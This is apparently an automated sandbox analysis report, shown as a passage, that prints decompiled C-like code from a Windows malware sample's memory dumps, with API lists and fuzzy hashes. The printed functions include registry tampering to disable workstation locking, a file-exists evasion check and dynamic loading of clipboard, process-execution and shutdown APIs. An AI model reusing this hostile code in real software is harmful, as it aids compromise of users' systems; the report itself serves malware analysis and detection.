%s Win7, xrefs: 10002E68
Vwxyab Defghijk, xrefs: 10002DAA

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: Close$HandleObjectSingleWait$ServiceSleep$ChangeCreateCtrlEventFileFindHandlerModuleNameNotificationRegisterStatusVersion_beginthreadexwsprintf
String ID: %s Win7$Vwxyab Defghijk
API String ID: 2598649506-3400359622
Opcode ID: 13a193c7d4c0c3f1859c44c6cc43eb289da0044c39de402cfb5a7925de79d081
Instruction ID: a179aec8039a3e5d2cd17e48e3de2e8b7cf0e8a762adc914bff6f8d6a88a8384
Opcode Fuzzy Hash: 13a193c7d4c0c3f1859c44c6cc43eb289da0044c39de402cfb5a7925de79d081
Instruction Fuzzy Hash: 9B219071841175EBFB21EB60CC8DEEB7BACFF0A791F200095F60D91155DB705A86CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00416F0E, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00416F0E() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t38;
				intOrPtr _t39;
				void* _t40;
				long _t43;
				void* _t44;
				void* _t60;
				long _t63;
				void* _t65;
				void* _t66;
				void* _t68;
				signed char* _t76;
				signed int _t80;
				void* _t83;
				void* _t85;
				signed int _t86;
				void* _t88;
				void* _t89;
				void* _t91;

				_push(_t68);
				_push(_t86);
				_t83 = _t68;
				_t1 = _t83 + 0x1c; // 0x4527c8
				_t38 = _t1;
				_v4 = _t38;
				EnterCriticalSection(_t38);
				_t3 = _t83 + 4; // 0x20
				_t39 =  *_t3;
				_t4 = _t83 + 8; // 0x3
				if( *_t4 >= _t39) {
					L6:
					_t80 = 1;
					if(_t39 <= 1) {
						L11:
						_t20 = _t39 + 0x20; // 0x40
						_t86 = _t20;
						_t21 = _t83 + 0x10; // 0x7ce208
						_t40 =  *_t21;
						if(_t40 != 0) {
							_t65 = GlobalHandle(_t40);
							GlobalUnlock(_t65);
							_t43 = E00405670(_t86, 8);
							_t68 = 0x2002;
							_t44 = GlobalReAlloc(_t65, _t43, ??);
						} else {
							_t63 = E00405670(_t86, 8);
							_pop(_t68);
							_t44 = GlobalAlloc(2, _t63); // executed
						}
						if(_t44 != 0) {
							_t66 = GlobalLock(_t44);
							_t24 = _t83 + 4; // 0x20
							E004277B0(_t80, _t66 +  *_t24 * 8, 0, _t86 -  *_t24 << 3);
							 *(_t83 + 4) = _t86;
							 *(_t83 + 0x10) = _t66;
							goto L19;
						} else {
							_t22 = _t83 + 0x10; // 0x7ce208
							_t85 =  *_t22;
							if(_t85 != 0) {
								GlobalLock(GlobalHandle(_t85));
							}
							LeaveCriticalSection(_v4);
							_push(_t86);
							_t88 = _t91;
							_push(_t68);
							_v28 = 0x44e8a0;
							E00429326( &_v28, 0x448908);
							asm("int3");
							_push(_t88);
							_t89 = _t91;
							_push(_t68);
							_v36 = 0x44e938;
							E00429326( &_v36, 0x44894c);
							asm("int3");
							_push(_t89);
							_push(_t68);
							_t9 =  &_v44; // 0x44e938
							_v44 = 0x44e9d0;
							E00429326(_t9, 0x448990);
							asm("int3");
							_t60 = _t68;
							 *((intOrPtr*)(_t60 + 4)) = 1;
							return _t60;
						}
					} else {
						_t17 = _t83 + 0x10; // 0x7ce208
						_t76 =  *_t17 + 8;
						while(( *_t76 & 0x00000001) != 0) {
							_t80 = _t80 + 1;
							_t76 =  &(_t76[8]);
							if(_t80 < _t39) {
								continue;
							}
							break;
						}
						if(_t80 < _t39) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x7ce208
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t29 = _t83 + 0xc; // 0x3
						if(_t80 >=  *_t29) {
							_t30 = _t80 + 1; // 0x4
							 *((intOrPtr*)(_t83 + 0xc)) = _t30;
						}
						_t32 = _t83 + 0x10; // 0x7ce208
						 *( *_t32 + _t80 * 8) =  *( *_t32 + _t80 * 8) | 0x00000001;
						_t36 = _t80 + 1; // 0x4
						 *((intOrPtr*)(_t83 + 8)) = _t36;
						LeaveCriticalSection(_v4);
						return _t80;
					} else {
						goto L6;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(004527C8,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416F1D
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416F73
GlobalHandle.KERNEL32(007CE208), ref: 00416F7C
GlobalUnlock.KERNEL32(00000000,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416F85
GlobalReAlloc.KERNEL32 ref: 00416F9C
GlobalHandle.KERNEL32(007CE208), ref: 00416FAE
GlobalLock.KERNEL32 ref: 00416FB5
LeaveCriticalSection.KERNEL32(00401099,?,?,?,?,004527AC,0041725F,00000004,0040E68E,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00416FBF
GlobalLock.KERNEL32 ref: 00416FCB
_memset.LIBCMT ref: 00416FE4
LeaveCriticalSection.KERNEL32(?,00000000,8E7DE579), ref: 00417010

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 6e89c913dff7a1627d137c85a4fffbfd0b83350ca2fb13c56a65863bd4a98f92
Instruction ID: c3bcd00eac62de9b530a75537476aaaa91939dad9910e48044c13ab1a52d64a2
Opcode Fuzzy Hash: 6e89c913dff7a1627d137c85a4fffbfd0b83350ca2fb13c56a65863bd4a98f92
Instruction Fuzzy Hash: BC31BC716007059FD7249F74EC48A67B7E9FB44314B01892EF996C3650DB38F886CB68

Uniqueness

Uniqueness Score: -1.00%

Function 1000290B, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 21
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000290B() {
				void _v8;

				_v8 = 1;
				SHSetValueA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", "DisableLockWorkstation", 4,  &_v8, 4); // executed
				__imp__SetThreadExecutionState(0x80000001);
				L1:
				Sleep(0x3e8); // executed
				OutputDebugStringA("SVP7-Thread running...\r\n"); // executed
				goto L1;
			}

0x10002928
0x1000292f
0x10002936
0x1000293c
0x10002941
0x1000294c
0x00000000

APIs

SHSetValueA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableLockWorkstation,00000004,?,00000004), ref: 1000292F
SetThreadExecutionState.KERNEL32 ref: 10002936
Sleep.KERNELBASE(000003E8), ref: 10002941
OutputDebugStringA.KERNELBASE(SVP7-Thread running...), ref: 1000294C

Strings

DisableLockWorkstation, xrefs: 10002918
SVP7-Thread running..., xrefs: 10002947
Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 10002922

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: DebugExecutionOutputSleepStateStringThreadValue
String ID: DisableLockWorkstation$SVP7-Thread running...$Software\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 2580165849-1184278068
Opcode ID: 091d263a2385860822e95b5f79f0caeb0645b497c74e0dc3cbc517c20886ae16
Instruction ID: 356109069cf1c53829b834f62caa249681bc619007ad4faa6a318b2db525b133
Opcode Fuzzy Hash: 091d263a2385860822e95b5f79f0caeb0645b497c74e0dc3cbc517c20886ae16
Instruction Fuzzy Hash: 3EE0B671551624FBF325EBD49C89FDF776CEB09711F508004FB11A6094DBB49B008BA5

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCF9, Relevance: 6.0, APIs: 4, Instructions: 34
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E1000CCF9(intOrPtr _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				void* _t16;
				char* _t17;

				_v20 = _a12;
				_v16 = _a16;
				_t16 = CreateEventA(0, 0, 0, 0);
				_v8 = _t16;
				_t17 =  &_v20;
				__imp___beginthreadex(_a4, _a8, E1000CBD9, _t17, _a20, _a24); // executed
				WaitForSingleObject(_v8, 0xffffffff);
				FindCloseChangeNotification(_v8); // executed
				return _t17;
			}

0x1000cd03
0x1000cd09
0x1000cd12
0x1000cd1b
0x1000cd1e
0x1000cd30
0x1000cd40
0x1000cd49
0x1000cd53

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000CD12
_beginthreadex.MSVCRT ref: 1000CD30
WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000CD40
FindCloseChangeNotification.KERNELBASE(?), ref: 1000CD49

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeCloseCreateEventFindNotificationObjectSingleWait_beginthreadex
String ID:
API String ID: 3885598390-0
Opcode ID: ad0f7ec64662bca58a2022b6a807c42a798f7e767a354621085c32fee53e81ec
Instruction ID: ce772f0cb4734fb78ef7562d1ccda63932f96424c42974d3cc2869668e6ebe41
Opcode Fuzzy Hash: ad0f7ec64662bca58a2022b6a807c42a798f7e767a354621085c32fee53e81ec
Instruction Fuzzy Hash: 34F0A975900119FFEF019FA8CD45CEE7BB9FB08254B104555FD15E2260E7318A259BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000CBD9, Relevance: 4.5, APIs: 3, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CBD9() {
				void* _t30;
				void* _t32;

				E100158AC(E1001A4C4, _t30);
				 *((intOrPtr*)(_t30 - 0x10)) = _t32 - 0x18;
				 *((intOrPtr*)(_t30 - 0x14)) = 0;
				 *((intOrPtr*)(_t30 - 4)) = 0;
				memcpy(_t30 - 0x24,  *(_t30 + 8), 0x10);
				SetEvent( *(_t30 - 0x18));
				if( *((intOrPtr*)(_t30 - 0x1c)) != 0) {
					E1000CE52(0);
				}
				 *((intOrPtr*)(_t30 - 0x14)) =  *(_t30 - 0x24)( *((intOrPtr*)(_t30 - 0x20)));
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return  *((intOrPtr*)(_t30 - 0x14));
			}

0x1000cbde
0x1000cbec
0x1000cbf6
0x1000cbf9
0x1000cbfd
0x1000cc09
0x1000cc12
0x1000cc15
0x1000cc1a
0x1000cc21
0x1000cc2c
0x1000cc35

APIs

__EH_prolog.LIBCMT ref: 1000CBDE
memcpy.MSVCRT ref: 1000CBFD
SetEvent.KERNEL32(?), ref: 1000CC09

Part of subcall function 1000CE52: LoadLibraryA.KERNEL32(user32.dll,?,?,00000000,?,?,?,?,?,?,00000000,Function_00015A2A,1001B478,000000FF,?,1000CC1A), ref: 1000CE7A
Part of subcall function 1000CE52: GetProcAddress.KERNEL32(?,OpenInputDesktop), ref: 1000CED5
Part of subcall function 1000CE52: GetProcAddress.KERNEL32(?,OpenDesktopA), ref: 1000CEE2
Part of subcall function 1000CE52: GetProcAddress.KERNEL32(?,CloseDesktop), ref: 1000CEEE

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$EventH_prologLibraryLoadmemcpy
String ID:
API String ID: 1665906595-0
Opcode ID: cc937eda3af7a1bc84ceedde64e440118936412959f45d976a13adca8b88c610
Instruction ID: 0a2f80f38b210c20971e2444fc4610cd1a9ce5c5f6c0d23ccf3392fecc80a137
Opcode Fuzzy Hash: cc937eda3af7a1bc84ceedde64e440118936412959f45d976a13adca8b88c610
Instruction Fuzzy Hash: CCF04FB5D00209AFDB00DFA8C9459DEBFB4FF08250F10406AF405B6152D7755E508EA0

Uniqueness

Uniqueness Score: -1.00%

Function 10002506, Relevance: 4.5, APIs: 3, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E10002506() {
				char _v24;
				int _t10;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				E10001E15( &_v24, strlen( &_v24), 0xd);
				_t10 = PathFileExistsA( &_v24); // executed
				if(_t10 != 0) {
					ExitProcess(0);
				}
				return _t10;
			}

0x10002516
0x10002517
0x10002518
0x10002519
0x10002520
0x1000252e
0x1000253a
0x10002544
0x10002548
0x10002548
0x1000254f

APIs

strlen.MSVCRT ref: 10002522
PathFileExistsA.KERNELBASE(?,?,?,?,?,?,100029D2,00000000,1000BDED), ref: 1000253A
ExitProcess.KERNEL32 ref: 10002548

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ExistsExitFilePathProcessstrlen
String ID:
API String ID: 2516096012-0
Opcode ID: 053be7b7db3717b2dba986a54f621b1e5806f712669b46f8ad205c3add93a138
Instruction ID: d3b4025932ad11825c4c20c45e558ba2945908530422f772f938d1b65ea4f7c7
Opcode Fuzzy Hash: 053be7b7db3717b2dba986a54f621b1e5806f712669b46f8ad205c3add93a138
Instruction Fuzzy Hash: 41E06572900619A7D701EBE4DD4AEDFB7ADEF45651F500022FD05F6090E7A0A70987F1

Uniqueness

Uniqueness Score: -1.00%

Function 10002B6D, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002B6D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				intOrPtr _t13;
				int _t17;

				_t13 = _a4;
				_v16 = _v16 & 0x00000000;
				 *0x10026978 = _t13;
				_v28 = _t13;
				_v32 = 0x20;
				_v20 = _a8;
				_v12 = _a12;
				_v24 = 5;
				_v8 = 0x3e8;
				_t17 = SetServiceStatus( *0x10026974,  &_v32); // executed
				return _t17;
			}

0x10002b73
0x10002b76
0x10002b7a
0x10002b7f
0x10002b85
0x10002b8c
0x10002b92
0x10002b99
0x10002ba6
0x10002bad
0x10002bb4

APIs

SetServiceStatus.SECHOST(00000020), ref: 10002BAD

Strings

, xrefs: 10002B85

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-3916222277
Opcode ID: 6cac2b90c83f588d0848a12c2fc23d7acf0ac3108025b5f16b0e72c497949638
Instruction ID: 29b1bbe6edbf33eb94f23c8ad10271715e6ae2047822d5b70c4376ba48e3a5b0
Opcode Fuzzy Hash: 6cac2b90c83f588d0848a12c2fc23d7acf0ac3108025b5f16b0e72c497949638
Instruction Fuzzy Hash: 2FF0A5B0C01209DFDB41DFA8C98979EBBF8BB08304F108159E814A7241E77496458F90

Uniqueness

Uniqueness Score: -1.00%

Function 0042E04D, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042E04D(void* __ebx, void* __edx, void* __edi, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;
				void* _t15;

				_t15 = __edx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x452f40 = _t6;
				if(_t6 != 0) {
					_t7 = E0042DFF2(__ebx, _t15, __edi, __eflags);
					__eflags = _t7 - 3;
					 *0x454918 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E0042E24E(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x452f40);
							 *0x452f40 =  *0x452f40 & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00426CFF,00000001), ref: 0042E05E
HeapDestroy.KERNEL32 ref: 0042E094

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 64b02cb8dbae4e63aa4ddc5fd686d5b03abf75ae3259888c305dd5e488586d45
Instruction ID: 9ff018e43a210781227fa6e342b256b4c5c5ee29807669acf89d3468b04ce661
Opcode Fuzzy Hash: 64b02cb8dbae4e63aa4ddc5fd686d5b03abf75ae3259888c305dd5e488586d45
Instruction Fuzzy Hash: 3AE06D72B113209FEB24AB32BD0672A36E4A741747F40487BF411C51A5EFE8C541A64D

Uniqueness

Uniqueness Score: -1.00%

Function 100025D4, Relevance: 1.3, APIs: 1, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100025D4() {
				void* _t12;

				VirtualFree( *(_t12 - 0x48), 0, 0x8000); // executed
				 *(_t12 - 4) =  *(_t12 - 4) | 0xffffffff;
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0x10));
				return 0;
			}

0x100025e1
0x100025e7
0x100025f0
0x100025fb

APIs

VirtualFree.KERNELBASE(?,00000000,00008000), ref: 100025E1

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 7ed33d788ae431ecc74b0a610e1e201e675dfa09d9c3c905f27ff95fcd161d95
Instruction ID: cc32454187030933484338305bcf34eb1358cdee651251ab84e4f4aa48ee4e45
Opcode Fuzzy Hash: 7ed33d788ae431ecc74b0a610e1e201e675dfa09d9c3c905f27ff95fcd161d95
Instruction Fuzzy Hash: 1AD0A732B00614DFDB108F98DC0778CBB70FB40720F104625D662E21D0D33054018B04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000C51F, Relevance: 389.0, APIs: 111, Strings: 111, Instructions: 455
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000C51F(void* __ecx) {
				struct HINSTANCE__* _t211;
				struct HINSTANCE__* _t258;
				struct HINSTANCE__* _t273;
				struct HINSTANCE__* _t279;
				struct HINSTANCE__* _t294;
				struct HINSTANCE__* _t313;
				struct HINSTANCE__* _t316;
				_Unknown_base(*)()* _t321;
				intOrPtr _t322;
				void* _t331;

				_t331 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_t211 = LoadLibraryA("kernel32.dll");
					 *(_t331 + 8) = _t211;
					 *((intOrPtr*)(_t331 + 0x28)) = GetProcAddress(_t211, "DeleteFileA");
					_t4 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x2c)) = GetProcAddress( *_t4, "CopyFileA");
					_t6 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x30)) = GetProcAddress( *_t6, "GlobalLock");
					_t8 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x34)) = GetProcAddress( *_t8, "GlobalAlloc");
					_t10 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x38)) = GetProcAddress( *_t10, "GlobalUnlock");
					_t12 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x3c)) = GetProcAddress( *_t12, "GetCurrentProcessId");
					_t14 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x40)) = GetProcAddress( *_t14, "GetCurrentThread");
					_t16 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x44)) = GetProcAddress( *_t16, "WinExec");
					_t18 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x48)) = GetProcAddress( *_t18, "DuplicateHandle");
					_t20 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x4c)) = GetProcAddress( *_t20, "TerminateProcess");
					_t22 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x50)) = GetProcAddress( *_t22, "OpenProcess");
					_t24 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x54)) = GetProcAddress( *_t24, "GetCurrentThreadId");
					_t26 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x58)) = GetProcAddress( *_t26, "SetPriorityClass");
					_t28 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x5c)) = GetProcAddress( *_t28, "SetThreadPriority");
					_t30 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x60)) = GetProcAddress( *_t30, "QueryFullProcessImageNameA");
					_t32 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x64)) = GetProcAddress( *_t32, "SetUnhandledExceptionFilter");
					_t34 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x68)) = GetProcAddress( *_t34, "CreateDirectoryA");
					_t36 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x70)) = GetProcAddress( *_t36, "SetFileAttributesA");
					_t38 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x74)) = GetProcAddress( *_t38, "DefineDosDeviceA");
					_t40 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x78)) = GetProcAddress( *_t40, "GetVersion");
					_t42 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x7c)) = GetProcAddress( *_t42, "VirtualAlloc");
					_t44 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x6c)) = GetProcAddress( *_t44, "CreateProcessA");
					_t46 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x80)) = GetProcAddress( *_t46, "GetModuleFileNameA");
					_t48 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x84)) = GetProcAddress( *_t48, "CreateMutexA");
					_t50 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x88)) = GetProcAddress( *_t50, "ReleaseMutex");
					_t52 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x8c)) = GetProcAddress( *_t52, "GetLastError");
					_t54 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x90)) = GetProcAddress( *_t54, "CloseHandle");
					_t56 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x94)) = GetProcAddress( *_t56, "Sleep");
					_t58 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x98)) = GetProcAddress( *_t58, "lstrcatA");
					_t60 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0x9c)) = GetProcAddress( *_t60, "GetTickCount");
					_t62 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xa0)) = GetProcAddress( *_t62, "WaitForSingleObject");
					_t64 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xa4)) = GetProcAddress( *_t64, "GetFileAttributesA");
					_t66 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xa8)) = GetProcAddress( *_t66, "CreateEventA");
					_t68 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xac)) = GetProcAddress( *_t68, "ResetEvent");
					_t70 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xb0)) = GetProcAddress( *_t70, "CancelIo");
					_t72 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xb4)) = GetProcAddress( *_t72, "SetEvent");
					_t74 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xb8)) = GetProcAddress( *_t74, "TerminateThread");
					_t76 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xbc)) = GetProcAddress( *_t76, "GetVersionExA");
					_t78 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xc0)) = GetProcAddress( *_t78, "GetExitCodeProcess");
					_t80 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xc4)) = GetProcAddress( *_t80, "ExpandEnvironmentStringsA");
					_t82 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xc8)) = GetProcAddress( *_t82, "GetSystemInfo");
					_t84 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xcc)) = GetProcAddress( *_t84, "GetSystemDirectoryA");
					_t86 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xd0)) = GetProcAddress( *_t86, "MoveFileA");
					_t88 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xd4)) = GetProcAddress( *_t88, "MoveFileExA");
					_t90 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xd8)) = GetProcAddress( *_t90, "WTSGetActiveConsoleSessionId");
					_t92 = _t331 + 8; // 0x74af0000
					 *((intOrPtr*)(_t331 + 0xdc)) = GetProcAddress( *_t92, "GetCurrentProcess");
					_t258 = LoadLibraryA("User32.dll");
					 *(_t331 + 0xc) = _t258;
					 *((intOrPtr*)(_t331 + 0xe0)) = GetProcAddress(_t258, "SetClipboardData");
					_t96 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xe4)) = GetProcAddress( *_t96, "EmptyClipboard");
					_t98 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xe8)) = GetProcAddress( *_t98, "CloseClipboard");
					_t100 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xec)) = GetProcAddress( *_t100, "GetClipboardData");
					_t102 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xf0)) = GetProcAddress( *_t102, "OpenClipboard");
					_t104 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xf4)) = GetProcAddress( *_t104, "wsprintfA");
					_t106 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xf8)) = GetProcAddress( *_t106, "ExitWindowsEx");
					_t108 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0xfc)) = GetProcAddress( *_t108, "MessageBoxA");
					_t110 = _t331 + 0xc; // 0x77400000
					 *((intOrPtr*)(_t331 + 0x100)) = GetProcAddress( *_t110, "IsWindowVisible");
